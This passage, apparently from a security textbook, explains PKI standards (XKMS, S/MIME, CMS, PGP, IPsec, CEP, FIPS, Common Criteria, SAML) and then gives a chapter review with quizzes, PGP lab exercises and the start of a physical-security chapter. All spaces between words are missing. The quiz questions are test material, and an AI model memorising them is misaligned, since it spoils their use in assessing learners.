Updatestothekeypairforend-entities,requiredperiodicallyandwhenakeypairiscompromisedorkeyscannotberecovered
End-entitycertificateupdates,requiredwhenacertificateexpires
PeriodicCAkey-pairupdates,similartoend-entitykey-pair
updates
Cross-certificationrequests,placedbyotherCAs
CertificateandCRLpublication,performedundertheappropriateconditionsofcertificateissuanceandcertificaterevocation
Key-pairrecovery,aservicetorestorekey-pairinformationforanend-entity;forexample,ifacertificatepasswordislostorthecertificatefileislost
Revocationrequests,supportingrequestsbyauthorizedentitiestorevokeacertificate
CMPalsodefinesmechanismsforperformingtheseoperations,eitheronlineorofflineusingfiles,e-mail,tokens,orweboperations.
XKMSTheXMLKeyManagementSpecificationdefinesservicestomanagePKIoperationswithintheExtensibleMarkupLanguage(XML)environment.TheseservicesareprovidedforhandlingPKIkeysandcertificatesautomatically.DevelopedbytheWorldWideWebConsortium(W3C),XKMSisintendedtosimplifyintegrationofPKIsandmanagementofcertificatesinapplications.Aswellasrespondingtoproblemsofauthenticationandverificationofelectronicsignatures,XKMSalsoallowscertificatestobemanaged,registered,orrevoked.XKMSservicesresideonaseparateserverthatinteractswithan
establishedPKI.TheservicesareaccessibleviaasimpleXMLprotocol.DeveloperscanrelyontheXKMSservices,makingitlesscomplextointerfacewiththePKI.Theservicesprovideforretrievingkeyinformation(owner,keyvalue,keyissuer,andthelike)andkeymanagement(suchaskeyregistrationandrevocation).RetrievaloperationsrelyontheXMLsignatureforthenecessary
information.Threetiersofservicearebasedontheclientrequestsandapplicationrequirements.Tier0providesameansofretrievingkey
informationbyembeddingreferencestothekeywithintheXMLsignature.Thesignaturecontainsanelementcalledaretrievalmethodthatindicateswaystoresolvethekey.Inthiscase,theclientsendsarequest,usingtheretrievalmethod,toobtainthedesiredkeyinformation.Forexample,iftheverificationkeycontainsalongchainofX.509v3certificates,aretrievalmethodcouldbeincludedtoavoidsendingthecertificateswiththedocument.Theclientwouldusetheretrievalmethodtoobtainthechainofcertificates.Fortier0,theserverindicatedintheretrievalmethodrespondsdirectlytotherequestforthekey,possiblybypassingtheXKMSserver.Thetier0processisshowninFigure7.6.
•Figure7.6XKMStier0retrieval
Withtier1operations,theclientforwardsthekey-informationportionsoftheXMLsignaturetotheXKMSserver,relyingontheservertoperformtheretrievalofthedesiredkeyinformation.ThedesiredinformationcanbelocaltotheXKMSserver,oritcanresideonanexternalPKIsystem.TheXKMSserverprovidesnoadditionalvalidationofthekeyinformation,suchascheckingwhetherthecertificatehasbeenrevokedorisstillvalid.Justasintier0,theclientperformsfinalvalidationofthedocument.Tier1iscalledthelocateservicebecauseitlocatestheappropriatekeyinformationfortheclient,asshowninFigure7.7.
•Figure7.7XKMStier1locateservice
Tier2iscalledthevalidateserviceandisillustratedinFigure7.8.Inthiscase,justasintier1,theclientreliesontheXKMSservicetoretrievetherelevantkeyinformationfromtheexternalPKI.TheXKMSserveralsoperformsdatavalidationonaportionofthekeyinformationprovidedbytheclientforthispurpose.ThisvalidationverifiesthebindingofthekeyinformationwiththedataindicatedbythekeyinformationcontainedintheXMLsignature.
•Figure7.8XKMStier2validateservice
Theprimarydifferencebetweentier1andtier2isthelevelofinvolvementoftheXKMSserver.Intier1,itcanserveonlyasarelayorgatewaybetweentheclientandthePKI.Intier2,theXKMSserverisactivelyinvolvedinverifyingtherelationbetweenthePKIinformationandthedocumentcontainingtheXMLsignature.XKMSreliesontheclientorunderlyingcommunicationsmechanismto
provideforthesecurityofthecommunicationswiththeXKMSserver.Thespecificationsuggestsusingoneofthreemethodsforensuringserverauthentication,responseintegrity,andrelevanceoftheresponsetotherequest:digitallysignedcorrespondence,atransportlayersecurityprotocol(suchasSSL,TLS,orWTLS),orapacketlayersecurityprotocol(suchasIPsec).Obviously,digitallysignedcorrespondenceintroducesitsownissuesregardingvalidationofthesignature,whichisthepurposeofXKMS.Itispossibletodefineothertiersofservice.Tiers3and4,anassertion
serviceandanassertionstatusservice,respectively,arementionedinthedefiningXKMSspecification,buttheyarenotdefined.Thespecificationstatesthey“could”bedefinedinotherdocuments.XKMSalsoprovidesservicesforkeyregistration,keyrevocation,and
keyrecovery.Authenticationfortheseactionsisbasedonapasswordorpassphrase,whichisprovidedwhenthekeysareregisteredandwhentheymustberecovered.
S/MIMETheSecure/MultipurposeInternetMailExtensions(S/MIME)messagespecificationisanextensiontotheMIMEstandardthatprovidesawaytosendandreceivesignedandencryptedMIMEdata.RSASecuritycreatedthefirstversionoftheS/MIMEstandard,usingtheRSAencryptionalgorithmandthePKCSseriesofstandards.Thesecondversiondatesfrom1998buthadanumberofseriousrestrictions,includingtherestrictionto40-bitDataEncryptionStandard(DES).ThecurrentversionoftheIETFstandardisdatedJuly2004andrequirestheuseofAdvanced
EncryptionStandard(AES).
CrossCheckE-mailEncryptionWanttounderstande-mailencryption?FlipaheadtoChapter16one-mailandinstantmessagingformoredetailsone-mailencryption.Thenanswerthesequestions:
Whyisitimportanttoencrypte-mail?Whatimpactscanmaliciouscodehaveonabusiness?
Whyisinstantmessagingahigherriskthane-mail?
ThechangesintheS/MIMEstandardhavebeensofrequentthatthestandardhasbecomedifficulttoimplementuntilv3.Farfromhavingastablestandardforseveralyearsthatproductmanufacturerscouldhavetimetogainexperiencewith,thereweremanychangestotheencryptionalgorithmsbeingused.Justasimportantly,andnotimmediatelyclearfromtheIETFdocuments,thestandardplacesrelianceuponmorethanoneotherstandardforittofunction.KeyamongtheseistheformatofapublickeycertificateasexpressedintheX.509standard.
IETFS/MIMEHistoryTheS/MIMEv2specificationsoutlineabasicstrategyforprovidingsecurityservicesfore-mailbutlackmanysecurityfeaturesrequiredbytheDepartmentofDefense(DoD)forusebythemilitary.ShortlyafterthedecisionwasmadetorevisetheS/MIMEv2specifications,theDoD,itsvendorcommunity,andcommercialindustrymettobegindevelopmentoftheenhancedspecifications.ThesenewspecificationswouldbeknownasS/MIMEv3.ParticipantsagreedthatbackwardcompatibilitybetweenS/MIMEv3andv2shouldbepreserved;otherwise,S/MIMEv3–compatibleapplicationswouldnotbeabletoworkwitholderS/MIMEv2–compatibleapplications.
AminimumsetofcryptographicalgorithmswasmandatedsothatdifferentimplementationsofthenewS/MIMEv3setofspecificationscouldbeinteroperable.ThisminimumsetmustbeimplementedinanapplicationforittobeconsideredS/MIME-compliant.Applicationscanimplementadditionalcryptographicalgorithmstomeettheircustomers’needs,buttheminimumsetmustalsobepresentintheapplicationsforinteroperabilitywithotherS/MIMEapplications.Thus,usersarenotforcedtouseS/MIME-specifiedalgorithms;theycanchoosetheirown,butiftheapplicationistobeconsideredS/MIME-compliant,thestandardalgorithmsmustalsobepresent.
IETFS/MIMEv3SpecificationsBuildingupontheoriginalworkbytheIMC-organizedgroup,theIETFhasworkedhardtoenhancetheS/MIMEv3specifications.TheultimategoalistohavetheS/MIMEv3specificationsreceiverecognitionasanInternetstandard.ThecurrentIETFS/MIMEv3setofspecificationsincludesthefollowing:
CryptographicMessageSyntax(CMS)
S/MIMEv3messagespecification
S/MIMEv3certificate-handlingspecification
Enhancedsecurityservices(ESS)forS/MIME
TechTip
S/MIMEinaNutshellS/MIMEprovidestwosecurityservicestoe-mail:digitalsignaturesandmessageencryption.Digitalsignaturesverifysenderidentity,andencryptioncankeepcontentsprivateduringtransmission.Theseservicescanbeusedindependentlyofeachother,andprovidethefoundationalbasisformessagesecurity.
TheCMSdefinesastandardsyntaxfortransmittingcryptographicinformationaboutcontentsofaprotectedmessage.OriginallybasedonthePKCS#7version1.5specification,theCMSspecificationwasenhancedbytheIETFS/MIMEworkinggrouptoincludeoptionalsecuritycomponents.JustastheS/MIMEv3providesbackwardcompatibilitywithv2,CMSprovidesbackwardcompatibilitywithPKCS#7,soapplicationswillbeinteroperableevenifthenewcomponentsarenotimplementedinaspecificapplication.Integrity,authentication,andnonrepudiationsecurityfeaturesare
providedbyusingdigitalsignaturesusingtheSignedDatasyntaxdescribedbytheCMS.CMSalsodescribeswhatisknownastheEnvelopedDatasyntaxtoprovideconfidentialityofthemessage’scontentthroughtheuseofencryption.ThePKCS#7specificationsupportskeyencryptionalgorithms,suchasRSA.AlgorithmindependenceispromotedthroughtheadditionofseveralfieldstotheEnvelopedDatasyntaxinCMS,whichisthemajordifferencebetweenthePKCS#7andCMSspecifications.ThegoalwastobeabletosupportspecificalgorithmssuchasDiffie-HellmanandtheKeyExchangeAlgorithm(KEA),whichisimplementedontheFortezzaCryptoCarddevelopedfortheDoD.OnefinalsignificantchangetotheoriginalspecificationsistheabilitytoincludeX.509AttributeCertificatesintheSignedDataandEnvelopedDatasyntaxesforCMS.
CMSTriple-EncapsulatedMessageAninterestingfeatureofCMSistheabilitytonestsecurityenvelopestoprovideacombinationofsecurityfeatures.Asanexample,aCMStriple-encapsulatedmessagecanbecreatedinwhichtheoriginalcontentandassociatedattributesaresignedandencapsulatedwithintheinnerSigned-Dataobject.TheinnerSignedDataobjectisinturnencryptedandencapsulatedwithinanEnvelopedDataobject.TheresultingEnvelopedDataobjectisthenalsosignedandfinallyencapsulatedwithinasecondSignedDataobject,theouterSignedDataobject.UsuallytheinnerSignedDataobjectissignedbytheoriginaluserandtheouterSignedDataobjectissignedbyanotherentity,suchasafirewalloramaillistagent,
providinganadditionallevelofsecurity.ThistripleencapsulationisnotrequiredofeveryCMSobject.Allthatis
requiredisasingleSignedDataobjectcreatedbytheusertosignamessageoranEnvelopedDataobjectiftheuserdesiredtoencryptamessage.
OpenPGPisawidelyusede-mailencryptionstandard.Anonproprietaryprotocolforencryptinge-mailusingpublickeycryptography,itisbasedonPGPasoriginallydevelopedbyPhilZimmermann,andisdefinedbytheOpenPGPworkinggroupoftheIETFproposedstandardRFC4880.
PGPPrettyGoodPrivacy(PGP)isapopularprogramthatisusedtoencryptanddecrypte-mailandfiles.Italsoprovidestheabilitytodigitallysignamessagesothereceivercanbecertainofthesender’sidentity.Takentogether,encryptingandsigningamessageallowsthereceivertobeassuredofwhosentthemessageandtoknowthatitwasnotmodifiedduringtransmission.Public-domainversionsofPGPhavebeenavailableforyears,ashaveinexpensivecommercialversions.PGPwasoneofthemostwidelyusedprogramsandwasfrequentlyused
bybothindividualsandbusinessestoensuredataande-mailprivacy.ItwasdevelopedbyPhilipR.Zimmermannin1991andquicklybecameadefactostandardfore-mailsecurity.ThepopularityofPGPleadtotheOpenPGPInternetstandard,RFC4880,andopensourcesolutions.GNUPrivacyGuard(GPG)isacommonalternativetoPGPinusetoday.
TechTip
APGPPersonalNote
AfterdistributingPGPin1991,including(indirectly)internationally,ZimmermannbecameaformaltargetofacriminalinvestigationbytheU.S.governmentin1993forexportingmunitionswithoutalicense,becausecryptosystemsusingkeyslargerthan40bitswereconsidered“munitions”underU.S.exportlaw.ZimmermannproceededtopublishtheentiresourcecodeofPGPinahardbackbook,which,unlikesoftware,isprotectedfromexportlawsbytheFirstAmendmentoftheU.S.Constitution.TheinvestigationofZimmermannwasdroppedafterseveralyears.
HowPGPWorksPGPusesavariationofthestandardpublickeyencryptionprocess.Inpublickeyencryption,anindividual(herecalledthecreator)usestheencryptionprogramtocreateapairofkeys.Onekeyisknownasthepublickeyandisdesignedtobegivenfreelytoothers.Theotherkeyiscalledtheprivatekeyandisdesignedtobeknownonlybythecreator.Individualswhowanttosendaprivatemessagetothecreatorencryptthemessageusingthecreator’spublickey.Thealgorithmisdesignedsuchthatonlytheprivatekeycandecryptthemessage,soonlythecreatorwillbeabletodecryptit.Thismethod,knownaspublickeyorasymmetricencryption,istime
consuming.Symmetricencryptionusesonlyasinglekeyandisgenerallyfaster.ItisbecauseofthisthatPGPisdesignedthewayitis.PGPusesasymmetricencryptionalgorithmtoencryptthemessagetobesent.Itthenencryptsthesymmetrickeyusedtoencryptthismessagewiththepublickeyoftheintendedrecipient.Boththeencryptedkeyandmessagearethensent.Thereceiver’sversionofPGPfirstdecryptsthesymmetrickeywiththeprivatekeysuppliedbytherecipientandthenusestheresultingdecryptedkeytodecrypttherestofthemessage.PGPcanusetwodifferentpublickeyalgorithms:Rivest-Shamir-
Adleman(RSA)andDiffie-Hellman.TheRSAversionusestheInternationalDataEncryptionAlgorithm(IDEA)andashortsymmetrickeytoencryptthemessageandthenusesRSAtoencrypttheshortIDEAkeyusingtherecipient’spublickey.TheDiffie-HellmanversionusestheCarlisleAdamsandStaffordTavares(CAST)algorithmtoencryptthe
messageandtheDiffie-HellmanalgorithmtoencrypttheCASTkey.Todecryptthemessage,thereverseisperformed.TherecipientusestheirprivatekeytodecrypttheIDEAorCASTkey,andthenusesthatdecryptedkeytodecryptthemessage.ThesearebothillustratedinFigure7.9.
•Figure7.9HowPGPworksforencryption
Togenerateadigitalsignature,PGPtakesadvantageofanotherpropertyofpublickeyencryptionschemes.Normally,thesenderencryptsusingthereceiver’spublickeyandthemessageisdecryptedattheotherendusingthereceiver’sprivatekey.Theprocesscanbereversedsothatthesenderencrypts(signs)withhisownprivatekey.Thereceiverthendecryptsthemessagewiththesender’spublickey.Sincethesenderistheonlyindividualwhohasakeythatwillcorrectlybedecryptedwiththesender’spublickey,thereceiverknowsthatthemessagewascreatedbythesenderwhoclaimstohavesentit.ThewayPGPaccomplishesthistaskistogenerateahashvaluefromtheuser’snameandothersignatureinformation.Thishashvalueisthenencryptedwiththesender’sprivatekeyknownonlybythesender.Thereceiverusesthesender’spublickey,whichisavailabletoeveryone,todecryptthehashvalue.Ifthedecryptedhashvaluematchesthehashvaluesentasthedigitalsignatureforthemessage,thenthereceiverisassuredthatthemessagewassentbythesenderwhoclaimstohavesentit.Typically,versionsofPGPcontainauserinterfacethatworkswith
commone-mailprogramssuchasMicrosoftOutlook.Ifyouwantotherstobeabletosendyouanencryptedmessage,youneedtoregisteryourpublickey,generatedbyyourPGPprogram,withaPGPpublickeyserver.Alternatively,youhavetoeithersendyourpublickeytoallthosewhowanttosendyouanencryptedmessageorpostyourkeytosomelocationfromwhichtheycandownloadit,suchasyourwebpage.Notethatusingapublickeyserveristhebettermethod,forallthereasonsoftrustdescribedinthediscussionofPKIsinChapter6.
TechTip
WhereCanYouUsePGP?
FormanyyearstheU.S.governmentwagedafightovertheexportationofPGPtechnology,andformanyyearsitsexportationwasillegal.Today,however,PGP-encryptede-mailcanbeexchangedwithmostusersoutsidetheUnitedStates,andmanyversionsofPGPareavailablefromnumerousinternationalsites.Ofcourse,beingabletoexchangePGP-encryptede-mailrequiresthattheindividualsonbothsidesofthecommunicationhavevalidversionsofPGP.Interestingly,internationalversionsofPGParejustassecureasdomesticversions—afeaturethatisnottrueofotherencryptionproducts.ItshouldbenotedthatthefreewareversionsofPGParenotlicensedforcommercialpurposes.
HTTPSMostwebactivityoccursusingHTTP,butthisprotocolispronetointerception.HTTPSuseseitherSSLorTLStosecurethecommunicationchannel.OriginallydevelopedbyNetscapeCommunicationsandimplementedinitsbrowser,HTTPShassincebeenincorporatedintomostcommonbrowsers.HTTPSusesthestandardTCPport443forTCP/IPcommunicationsratherthanthestandardport80usedforHTTP.Aspreviouslydiscussed,becauseofvulnerabilitiesinSSL,onlyTLSisrecommendedforHTTPStoday.
IPsecIPsecisacollectionofIPsecurityfeaturesdesignedtointroducesecurityatthenetworkorpacket-processinglayerinnetworkcommunication.OtherapproacheshaveattemptedtoincorporatesecurityathigherlevelsoftheTCP/IPsuitesuchasatthelevelwhereapplicationsreside.IPsecisdesignedtoprovidesecureIPcommunicationsovertheInternet.Inessence,IPsecprovidesasecureversionoftheIPbyintroducingauthenticationandencryptiontoprotectLayer4protocols.IPsecisoptionalforIPv4butisrequiredforIPv6.Obviously,bothendsofthecommunicationneedtouseIPsecfortheencryption/decryptionprocesstooccur.IPsecprovidestwotypesofsecurityservicetoensureauthenticationand
confidentialityforeitherthedataalone(referredtoasIPsectransportmode)orforboththedataandheader(referredtoastunnelmode).SeeChapter11formoredetailontunnelingandIPsecoperation.IPsecintroducesseveralnewprotocols,includingtheAuthenticationHeader(AH),whichbasicallyprovidesauthenticationofthesender,andtheEncapsulatingSecurityPayload(ESP),whichaddsencryptionofthedatatoensureconfidentiality.IPsecalsoprovidesforpayloadcompressionbeforeencryptionusingtheIPPayloadCompressionProtocol(IPcomp).Frequently,encryptionnegativelyimpactstheabilityofcompressionalgorithmstofullycompressdatafortransmission.Byprovidingtheabilitytocompressthedatabeforeencryption,IPsecaddressesthisissue.
CEPCertificateEnrollmentProtocol(CEP)wasoriginallydevelopedbyVeriSignforCiscoSystems.Itwasdesignedtosupportcertificateissuance,distribution,andrevocationusingexistingtechnologies.ItsusehasgrowninclientandCAapplications.TheoperationssupportedincludeCAandRApublickeydistribution,certificateenrollment,certificaterevocation,certificatequery,andCRLquery.OneofthekeygoalsofCEPwastouseexistingtechnologywhenever
possible.ItusesbothPKCS#7(CryptographicMessageSyntaxStandard)andPKCS#10(CertificationRequestSyntaxStandard)todefineacommonmessagesyntax.ItsupportsaccesstocertificatesandCRLsusingeithertheLightweightDirectoryAccessProtocol(LDAP)ortheCEP-definedcertificatequery.
OtherStandardsTherearemanyadditionalstandardsassociatedwithinformationsecuritythatarenotspecificallyorsolelyassociatedwithPKIand/orcryptography.Theremainderofthechapterwillintroducethesestandardsandprotocols.
FIPSTheFederalInformationProcessingStandardsPublications(FIPSPUBSorsimplyFIPS)describevariousstandardsfordatacommunicationissues.ThesedocumentsareissuedbytheU.S.governmentthroughtheNationalInstituteofStandardsandTechnology(NIST),whichistaskedwiththeirdevelopment.NISTcreatesthesepublicationswhenacompellinggovernmentneedrequiresastandardforuseinareassuchassecurityorsysteminteroperabilityandnorecognizedindustrystandardexists.ThreecategoriesofFIPSPUBSarecurrentlymaintainedbyNIST:
Hardwareandsoftwarestandards/guidelines
Datastandards/guidelines
Computersecuritystandards/guidelines
ThesedocumentsrequirethatproductssoldtotheU.S.governmentcomplywithone(ormore)oftheFIPSstandards.Thestandardscanbeobtainedfromwww.nist.gov/itl/fips.cfm.
FIPS140-2relatestospecificcryptographicstandardsforthevalidationofcomponentsusedinU.S.governmentsystems.SystemscanbeaccreditedtotheFIPS140-2standardtodemonstratelevelsofsecurityfrom“approvedalgorithms”tohigherlevelsthatincludeadditionalprotectionsuptoandincludingphysicalsecurityandtamperproofmechanisms.
CommonCriteriaTheCommonCriteriaforInformationTechnologySecurity(CommonCriteriaorCC)istheresultofanefforttodevelopajointsetofsecurityprocessesandstandardsthatcanbeusedbytheinternationalcommunity.ThemajorcontributorstotheCCarethegovernmentsoftheUnitedStates,Canada,France,Germany,theNetherlands,andtheUnitedKingdom.The
CCalsoprovidesalistingoflaboratoriesthatapplythecriteriaintestingsecurityproducts.ProductsthatareevaluatedbyoneoftheapprovedlaboratoriesreceiveanEvaluationAssuranceLevelofEAL1throughEAL7(EAL7isthehighestlevel),withEAL4,forexample,designedforenvironmentsrequiringamoderatetohighlevelofindependentlyassuredsecurity,andEAL1beingdesignedforenvironmentsinwhichsomeconfidenceinthecorrectoperationofthesystemisrequiredbutwherethethreatstothesystemarenotconsideredserious.TheCCalsoprovidesalistingofproductsbyfunctionthathaveperformedataspecificEAL.
WTLSTheWirelessTransportLayerSecurity(WTLS)protocolisbasedontheTLSprotocol.WTLSprovidesreliabilityandsecurityforwirelesscommunicationsusingtheWirelessApplicationProtocol(WAP).WTLSisnecessaryduetothelimitedmemoryandprocessingabilitiesofWAP-enabledphones.WTLScanbeimplementedinoneofthreeclasses:Class1iscalled
anonymousauthenticationbutisnotdesignedforpracticaluse.Class2iscalledserverauthenticationandisthemostcommonmodel.Theclientsandservermayauthenticateusingdifferentmeans.Class3isserverandclientauthentication.InClass3authentication,theclient’sandserver’sWTLScertificatesareauthenticated.Class3isthestrongestformofauthenticationandencryption.
ISO/IEC27002(FormerlyISO17799)ISO/IEC27002isaverypopularanddetailedstandardforcreatingandimplementingsecuritypolicies.ISO/IEC27002wasformerlyISO17799,whichwasbasedonversion2oftheBritishStandard7799(BS7799)publishedinMay1999.Withtheincreasedemphasisplacedonsecurityinboththegovernmentandindustryinrecentyears,manyorganizationsarenowtrainingtheirauditpersonneltoevaluatetheirorganizationsagainst
theISO/IEC27002standard.Thestandardisdividedinto12sections,eachcontainingmoredetailedstatementsdescribingwhatisinvolvedforthattopic:
RiskassessmentDeterminetheimpactofrisksSecuritypolicyGuidanceandpolicyprovidedbymanagementOrganizationofinformationsecurityGovernancestructuretoimplementsecuritypolicy
AssetmanagementInventoryandclassificationofassetsHumanresourcessecurityPoliciesandproceduresaddressingsecurityforemployeesincludinghires,changes,anddepartures
PhysicalandenvironmentalsecurityProtectionofthecomputerfacilities
CommunicationsandoperationsmanagementManagementoftechnicalsecuritycontrolsinsystemsandnetworks
AccesscontrolRestrictionofaccessrightstonetworks,systems,applications,functions,anddata
Informationsystemsacquisition,development,andmaintenanceBuildingsecurityintoapplications
InformationsecurityincidentmanagementAnticipatingandrespondingappropriatelytoinformationsecuritybreaches
BusinesscontinuitymanagementProtecting,maintaining,andrecoveringbusiness-criticalprocessesandsystems
ComplianceEnsuringconformancewithinformationsecuritypolicies,standards,laws,andregulations
SAMLSecurityAssertionMarkupLanguage(SAML)isasinglesign-on
capabilityusedforwebapplicationstoensureuseridentitiescanbesharedandareprotected.Itdefinesstandardsforexchangingauthenticationandauthorizationdatabetweensecuritydomains.Itisbecomingincreasinglyimportantwithcloud-basedsolutionsandwithSoftware-as-a-Service(SaaS)applications,becauseitensuresinteroperabilityacrossidentityproviders.SAMLisanXML-basedprotocolthatusessecuritytokensand
assertionstopassinformationabouta“principal”(typicallyanenduser)withaSAMLauthority(an“identityprovider”orIdP)andtheserviceprovider(SP).TheprincipalrequestsaservicefromtheSPwhichthenrequestsandobtainsanidentityassertionfromtheIdP.TheSPcanthengrantaccessorperformtherequestedservicefortheprincipal.
Chapter7Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutPKIstandardsandprotocols.
IdentifythestandardsinvolvedinestablishinganinteroperableInternetPKI
PKIXandPKCSdefinethemostcommonlyusedPKIstandards.
PKIX,PKCS,X.509,ISAKMP,XKMS,andCMPcombinetoimplementPKI.
SSL/TLS,S/MIME,HTTPS,andIPsecareprotocolsthatusePKI.
ExplaininteroperabilityissueswithPKIstandards
Standardsandprotocolsareimportantbecausetheydefinethebasisfor
howcommunicationwilltakeplace.Theuseofstandardsandprotocolsprovidesacommon,interoperableenvironmentforsecurelyexchanginginformation.
Withoutthesestandardsandprotocols,twoentitiesmayindependentlydeveloptheirownmethodtoimplementthevariouscomponentsforaPKI,andthetwowillnotbecompatible.
OntheInternet,notbeingcompatibleandnotbeingabletocommunicateisnotanoption.
DescribehowthecommonInternetprotocolsimplementthePKIstandards
ThreemainstandardshaveevolvedovertimetoimplementPKIsontheInternet.
Twoofthemainstandardsarebasedonathirdstandard,theX.509standard,andestablishcomplementarystandardsforimplementingPKIs.ThesetwostandardsarePublicKeyInfrastructureX.509(PKIX)andPublicKeyCryptographyStandards(PKCS).
PKIXdefinesstandardsforinteractionsandoperationsforfourcomponenttypes:theuser(end-entity),certificateauthority(CA),registrationauthority(RA),andtherepositoryforcertificatesandcertificaterevocationlists(CRLs).
PKCSdefinesmanyofthelower-levelstandardsformessagesyntax,cryptographicalgorithms,andthelike.
ThereareotherprotocolsandstandardsthathelpdefinethemanagementandoperationofthePKIandrelatedservices,suchasISAKMP,XKMS,andCMP.
S/MIMEisusedtoencrypte-mail.
SSL,TLS,andWTLSareusedforsecurepackettransmission.
IPsecisusedtosupportvirtualprivatenetworks.
TheCommonCriteriaestablishesaseriesofcriteriafromwhichsecurityproductscanbeevaluated.
TheISO/IEC27002standardprovidesapointfromwhichsecuritypoliciesandpracticescanbedevelopedintwelveareas.
VarioustypesofpublicationsareavailablefromNISTsuchasthosefoundintheFIPSseries.
KeyTermscertificate(172)certificateauthority(CA)(169)certificaterevocationlist(CRL)(169)InternetSecurityAssociationandKeyManagementProtocol
(ISAKMP)(174)IPsec(182)PrettyGoodPrivacy(PGP)(180)publickeyinfrastructure(PKI)(167)Secure/MultipurposeInternetMailExtensions(S/MIME)(178)SecureSocketsLayer(SSL)(173)SecurityAssertionMarkupLanguage(SAML)(185)TransportLayerSecurity(TLS)(173)WirelessApplicationProtocol(WAP)(184)WirelessTransportLayerSecurity(WTLS)(184)X.509(172)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1._______________isaprotocolusedtosecureIPpacketsduring
transmissionacrossanetwork.Itoffersauthentication,integrity,andconfidentialityservices.ItusesAuthenticationHeaders(AHs)andEncapsulatingSecurityPayload(ESP)toaccomplishthisfunctionality.
2.Anencryptioncapabilitydesignedtoencryptabovethetransportlayer,enablingsecuresessionsbetweenhosts,iscalled______________.
3.A(n)_______________isanentitythatisresponsibleforissuingandrevokingcertificates.Thistermisalsoappliedtoserversoftwarethatprovidestheseservices.
4.Adigitallysignedobjectthatlistsallofthecurrentbutrevokedcertificatesissuedbyagivencertificateauthorityiscalledthe______________.Itallowsuserstoverifywhetheracertificateiscurrentlyvalideveniftheexpirationdatehasn’tpassed.
5._______________isaformatthathasbeenadoptedtostandardizedigitalcertificates.
6.Infrastructureforbindingapublickeytoaknownuserthroughatrustedintermediary,typicallyacertificateauthority,iscalledthe_______________.
7.The_______________isaprotocolframeworkthatdefinesthemechanicsofimplementingakeyexchangeprotocolandnegotiationofasecuritypolicy.
8.TheencryptionprotocolthatisusedonWirelessApplicationProtocol(WAP)networksiscalled_______________.
9.Aprotocolfortransmittingdatatosmallhandhelddeviceslikecellularphonesisthe_______________.
10._______________isapopularencryptionprogramthathastheabilitytoencryptanddigitallysigne-mailandfiles.
Multiple-ChoiceQuiz1.Whichofthefollowingisusedtograntpermissionsusingrule-
based,role-based,andrank-basedaccesscontrols?
A.AQualifiedCertificate
B.AControlCertificate
C.AnAttributeCertificate
D.AnOptionalCertificate
2.XKMSallowscertificatestobeallofthefollowingexcept:A.Created
B.Registered
C.Managed
D.Revoked
3.TransportLayerSecurityconsistsofwhichtwoprotocols?A.TheTLSRecordProtocolandTLSHandshakeProtocol
B.TheTLSRecordProtocolandTLSCertificateProtocol
C.TheTLSCertificateProtocolandTLSHandshakeProtocol
D.TheTLSKeyProtocolandTLSHandshakeProtocol
4.Whichofthefollowingprovidesamethodforimplementingakeyexchangeprotocol?
A.EISA
B.ISAKMP
C.ISA
D.ISAKEY
5.Whichofthefollowingisadetailedstandardforcreatingandimplementingsecuritypolicies?
A.PKIX
B.ISO/IEC27002
C.FIPS
D.X.509
6.Arelationshipwheretwoormoreentitiesdefinehowtheywillcommunicatesecurelyisknownaswhat?
A.Athree-wayhandshake
B.Asecurityassociation
C.Athree-wayagreement
D.Asecurityagreement
7.WhatisthepurposeofXKMS?A.Extendssessionassociationsovermanytransportprotocols
B.EncapsulatessessionassociationsoverTCP/IP
C.DefinesservicestomanageheterogeneousPKIoperationsviaXML
D.DesignedtoreplaceSSL
8.Whichofthefollowingisasecuree-mailstandard?A.POP3
B.IMAP
C.SMTP
D.S/MIME
9.WhichofthefollowingisajointsetofsecurityprocessesandstandardsusedbyapprovedlaboratoriestoawardanEvaluationAssuranceLevel(EAL)fromEAL1toEAL7?
A.CommonCriteria
B.FIPS
C.ISO17700
D.IEEEX.509
10.TransportLayerSecurityforHTTPuseswhatporttocommunicate?A.53
B.80
C.143
D.443
EssayQuiz1.YouaretheInformationSecurityOfficeratamedium-sized
company(1500employees).TheCIOhasaskedyoutoexplainwhyyourecommendusingcommercialPKIsratherthanimplementingsuchacapabilityin-housewiththesoftwaredevelopersyoualreadyhave.Writethreesuccinctsentencesthatwouldgetyourpointacrossandaddressthreekeyissues.
2.Imagineyouareawebdeveloperforasmalllocallyownedbusiness.ExplainwhenusingHTTPwouldbesatisfactoryandwhy,andexplainwhenyoushoulduseHTTPSandwhy.
3.Explaininyourownwordshow,byapplyingbothasymmetricandsymmetricencryption,yourbrowserusesTLStoprotecttheprivacyoftheinformationpassingbetweenyourbrowserandawebserver.
4.Itiswellunderstoodthatasymmetricencryptionconsumesmorecomputingresourcesthansymmetricencryption.ExplainhowPGPusesbothasymmetricandsymmetricencryptiontobebothsecureandefficient.
LabProjects
Notethatfortheselabprojects,itwouldbebesttohaveapartnersothatyoucaneachhaveyourownpairofpublic/privatekeystoconfirmtheoperationofPGP.
•LabProject7.1LoadeitheratrialversionofPGPorGnuPrivacyGuard(GPG).Installitandcreateapublic/privatekeypairforyourself.Createadocumentusingawordprocessorandencryptitusingthereceiver’spublickey.Sendittoapartner(oryourself)andthendecryptitusingthecorrespondingprivatekey.
•LabProject7.2CreateanotherdocumentdifferentfromtheoneusedinLabProject7.1.Thistimeuseyourprivatekeytodigitallysignthedocumentandsendittoapartner(oryourself)whocanthenusethepublickeytoconfirmthatitreallyisfromtheindicatedsender.
chapter8 PhysicalSecurity
Baseballis90percentmental,theotherhalfisphysical.
—YOGIBERRA
F
Inthischapter,youwilllearnhowto
Describehowphysicalsecuritydirectlyaffectscomputerandnetworksecurity
Discussstepsthatcanbetakentohelpmitigaterisks
Identifythedifferenttypesoffiresandthevariousfiresuppressionsystemsdesignedtolimitthedamagecausedbyfires
Explainelectronicaccesscontrolsandtheprinciplesofconvergence
ormosthomes,locksaretheprimarymeansofachievingphysicalsecurity,andalmosteveryonelocksthedoorstohisorherhomeuponleavingtheresidence.Somegoevenfurtherandsetupintrusionalarm
systemsinadditiontolocks.Alltheseprecautionsareconsiderednecessarybecausepeoplebelievetheyhavesomethingsignificantinsidethehousethatneedstobeprotected,suchasimportantpossessionsandimportantpeople.Physicalsecurityisanimportanttopicforbusinessesdealingwiththe
